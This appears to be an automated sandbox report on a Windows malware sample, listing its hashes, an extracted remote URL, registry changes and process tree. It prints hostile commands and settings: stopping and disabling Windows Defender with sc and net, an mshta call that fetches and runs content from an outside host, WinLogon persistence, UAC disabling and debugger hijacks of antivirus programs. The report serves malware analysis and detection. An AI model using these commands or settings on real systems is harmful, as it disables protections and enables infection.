Analysis
-
max time kernel
156s -
max time network
177s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
05-12-2022 12:39
Static task
static1
Behavioral task
behavioral1
Sample
900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe
Resource
win10v2004-20221111-en
General
-
Target
900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe
-
Size
2.2MB
-
MD5
44e75fcf7bffbb2d15574bd78abb663b
-
SHA1
43be4f349f05f5ba056961ee8bdc9e4e8c443a10
-
SHA256
900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f
-
SHA512
c6aaaec41b7b84586a43a2fde49641de06aafa1d1d5d0f1000dcc69b518e7a2920165c708da3048abd889513ff8c23c187bfd9cf5d12ae4a98932333be43a961
-
SSDEEP
49152:Tb+qOGFGc/y+BMsAuII26f0EQh6fVnOTk3DSpX4R9DKp52:Tb2ou+mZpI268EQsx3D2XNpw
Malware Config
Extracted
http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=SOCAAGDT&2=i-s&3=135&4=9200&5=6&6=2&7=919041&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\yqfoks.exe" yqfoks.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" yqfoks.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" yqfoks.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" yqfoks.exe -
Executes dropped EXE 1 IoCs
pid Process 316 yqfoks.exe -
Sets file execution options in registry 2 TTPs 16 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe yqfoks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" yqfoks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe yqfoks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe yqfoks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" yqfoks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" yqfoks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe yqfoks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe yqfoks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe yqfoks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe" yqfoks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe" yqfoks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe yqfoks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" yqfoks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe yqfoks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe \Debugger = "svchost.exe" yqfoks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" yqfoks.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" yqfoks.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 648 sc.exe 3488 sc.exe 1036 sc.exe 2840 sc.exe 3236 sc.exe 1248 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 316 yqfoks.exe Token: SeShutdownPrivilege 316 yqfoks.exe Token: SeDebugPrivilege 316 yqfoks.exe Token: SeShutdownPrivilege 316 yqfoks.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe 316 yqfoks.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 5004 wrote to memory of 648 5004 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 82 PID 5004 wrote to memory of 648 5004 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 82 PID 5004 wrote to memory of 648 5004 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 82 PID 5004 wrote to memory of 3488 5004 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 83 PID 5004 wrote to memory of 3488 5004 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 83 PID 5004 wrote to memory of 3488 5004 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 83 PID 5004 wrote to memory of 1372 5004 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 87 PID 5004 wrote to memory of 1372 5004 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 87 PID 5004 wrote to memory of 1372 5004 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 87 PID 5004 wrote to memory of 1036 5004 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 85 PID 5004 wrote to memory of 1036 5004 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 85 PID 5004 wrote to memory of 1036 5004 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 85 PID 1372 wrote to memory of 3280 1372 net.exe 90 PID 1372 wrote to memory of 3280 1372 net.exe 90 PID 1372 wrote to memory of 3280 1372 net.exe 90 PID 5004 wrote to memory of 316 5004 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 92 PID 5004 wrote to memory of 316 5004 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 92 PID 5004 wrote to memory of 316 5004 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 92 PID 316 wrote to memory of 2840 316 yqfoks.exe 93 PID 316 wrote to memory of 2840 316 yqfoks.exe 93 PID 316 wrote to memory of 2840 316 yqfoks.exe 93 PID 316 wrote to memory of 3236 316 yqfoks.exe 94 PID 316 wrote to memory of 3236 316 yqfoks.exe 94 PID 316 wrote to memory of 3236 316 yqfoks.exe 94 PID 316 wrote to memory of 3848 316 yqfoks.exe 95 PID 316 wrote to memory of 3848 316 yqfoks.exe 95 PID 316 wrote to memory of 3848 316 yqfoks.exe 95 PID 316 wrote to memory of 1248 316 yqfoks.exe 99 PID 316 wrote to memory of 1248 316 yqfoks.exe 99 PID 316 wrote to memory of 1248 316 yqfoks.exe 99 PID 3848 wrote to memory of 2360 3848 net.exe 101 PID 3848 wrote to memory of 2360 3848 net.exe 101 PID 3848 wrote to memory of 2360 3848 net.exe 101 PID 5004 wrote to memory of 3968 5004 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 103 PID 5004 wrote to memory of 3968 5004 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 103 PID 5004 wrote to memory of 3968 5004 900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe 103 PID 316 wrote to memory of 1188 316 yqfoks.exe 105 PID 316 wrote to memory of 1188 316 yqfoks.exe 105 PID 316 wrote to memory of 1188 316 yqfoks.exe 105 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System yqfoks.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" yqfoks.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" yqfoks.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" yqfoks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe"C:\Users\Admin\AppData\Local\Temp\900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
PID:648
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
PID:3488
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
PID:1036
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵PID:3280
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\yqfoks.exeC:\Users\Admin\AppData\Roaming\Microsoft\yqfoks.exe2⤵
- Modifies WinLogon for persistence
- UAC bypass
- Executes dropped EXE
- Sets file execution options in registry
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
- System policy modification
PID:316 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
PID:2840
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:3236
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵PID:2360
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
PID:1248
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=SOCAAGDT&2=i-s&3=135&4=9200&5=6&6=2&7=919041&8=1033"3⤵PID:1188
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\900FFC~1.EXE" >> NUL2⤵PID:3968
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.2MB
MD544e75fcf7bffbb2d15574bd78abb663b
SHA143be4f349f05f5ba056961ee8bdc9e4e8c443a10
SHA256900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f
SHA512c6aaaec41b7b84586a43a2fde49641de06aafa1d1d5d0f1000dcc69b518e7a2920165c708da3048abd889513ff8c23c187bfd9cf5d12ae4a98932333be43a961
-
Filesize
2.2MB
MD544e75fcf7bffbb2d15574bd78abb663b
SHA143be4f349f05f5ba056961ee8bdc9e4e8c443a10
SHA256900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f
SHA512c6aaaec41b7b84586a43a2fde49641de06aafa1d1d5d0f1000dcc69b518e7a2920165c708da3048abd889513ff8c23c187bfd9cf5d12ae4a98932333be43a961